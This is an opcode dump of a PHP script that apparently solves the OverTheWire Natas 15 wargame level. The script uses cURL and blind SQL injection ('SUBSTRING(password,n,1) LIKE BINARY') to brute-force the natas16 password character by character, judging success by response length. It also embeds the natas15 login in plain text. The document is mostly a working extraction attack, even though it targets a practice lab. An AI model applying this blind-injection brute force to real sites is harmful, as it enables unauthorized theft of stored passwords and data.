Finding entry points
Branch analysis from position: 0
1 jumps found. (Code = 42) Position 1 = 67
Branch analysis from position: 67
2 jumps found. (Code = 44) Position 1 = 69, Position 2 = 12
Branch analysis from position: 69
1 jumps found. (Code = 62) Position 1 = -2
Branch analysis from position: 12
1 jumps found. (Code = 42) Position 1 = 64
Branch analysis from position: 64
2 jumps found. (Code = 44) Position 1 = 66, Position 2 = 14
Branch analysis from position: 66
2 jumps found. (Code = 44) Position 1 = 69, Position 2 = 12
Branch analysis from position: 69
Branch analysis from position: 12
Branch analysis from position: 14
2 jumps found. (Code = 43) Position 1 = 57, Position 2 = 63
Branch analysis from position: 57
2 jumps found. (Code = 44) Position 1 = 66, Position 2 = 14
Branch analysis from position: 66
Branch analysis from position: 14
Branch analysis from position: 63
filename: /in/hjqT0
function name: (null)
number of ops: 72
compiled vars: !0 = $chars, !1 = $credentials, !2 = $ch, !3 = $pass, !4 = $target, !5 = $needle, !6 = $xx, !7 = $yy, !8 = $char, !9 = $target2, !10 = $page
line #* E I O op fetch ext return operands
-------------------------------------------------------------------------------------
4 0 E > INCLUDE_OR_EVAL 'LIB_http.php', INCLUDE
6 1 INCLUDE_OR_EVAL 'LIB_parse.php', INCLUDE
8 2 ASSIGN !0, '1234567890abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ'
9 3 ASSIGN !1, 'natas15%3Am2azll7JH6HS8Ay3SOjG3AGGlDGTJSTV'
10 4 INIT_FCALL_BY_NAME 'curl_init'
5 DO_FCALL 0 $15
6 ASSIGN !2, $15
11 7 ASSIGN !3, ''
12 8 ASSIGN !4, 'natas15.natas.labs.overthewire.org%2Findex.php'
13 9 ASSIGN !5, 'r+e'
14 10 ASSIGN !6, 1
11 > JMP ->67
15 12 > ASSIGN !7, 0
13 > JMP ->64
17 14 > INIT_FCALL 'substr'
15 SEND_VAR !0
16 SEND_VAR !7
17 SEND_VAL 1
18 DO_ICALL $22
19 ASSIGN !8, $22
18 20 ROPE_INIT 3 ~25 '%3Fusername%3Dnatas16%22+and+SUBSTRING%28password%2C'
21 ROPE_ADD 1 ~25 ~25, !6
22 ROPE_END 2 ~24 ~25, '%2C1%29+LIKE+BINARY+%22'
23 CONCAT ~27 !4, ~24
24 CONCAT ~28 ~27, !8
25 ASSIGN !9, ~28
19 26 CONCAT ~30 '%0A', !9
27 CONCAT ~31 ~30, '%0A'
28 ECHO ~31
20 29 INIT_FCALL_BY_NAME 'curl_setopt'
30 SEND_VAR_EX !2
31 FETCH_CONSTANT ~32 'CURLOPT_URL'
32 SEND_VAL_EX ~32
33 SEND_VAR_EX !9
34 DO_FCALL 0
21 35 INIT_FCALL_BY_NAME 'curl_setopt'
36 SEND_VAR_EX !2
37 FETCH_CONSTANT ~34 'CURLOPT_USERPWD'
38 SEND_VAL_EX ~34
39 SEND_VAR_EX !1
40 DO_FCALL 0
22 41 INIT_FCALL_BY_NAME 'curl_setopt'
42 SEND_VAR_EX !2
43 FETCH_CONSTANT ~36 'CURLOPT_RETURNTRANSFER'
44 SEND_VAL_EX ~36
45 SEND_VAL_EX <true>
46 DO_FCALL 0
23 47 INIT_FCALL_BY_NAME 'curl_exec'
48 SEND_VAR_EX !2
49 DO_FCALL 0 $38
50 ASSIGN !10, $38
24 51 STRLEN ~40 !10
52 CONCAT ~41 '%0A', ~40
53 ECHO ~41
25 54 STRLEN ~42 !10
55 IS_SMALLER ~42, 288
56 > JMPZ ~43, ->63
27 57 > CONCAT ~44 !3, !8
58 ASSIGN !3, ~44
28 59 CONCAT ~46 '%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0ALa+pass+per+ora+e%27%3A+', !3
60 CONCAT ~47 ~46, '%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A'
61 ECHO ~47
29 62 ASSIGN !7, 62
15 63 > PRE_INC !7
64 > IS_SMALLER !7, 62
65 > JMPNZ ~50, ->14
14 66 > PRE_INC !6
67 > IS_SMALLER !6, 33
68 > JMPNZ ~52, ->12
33 69 > CONCAT ~53 '%0ALa+password+e%27%3A+', !3
70 ECHO ~53
35 71 > RETURN 1
Generated using Vulcan Logic Dumper, using php 8.0.0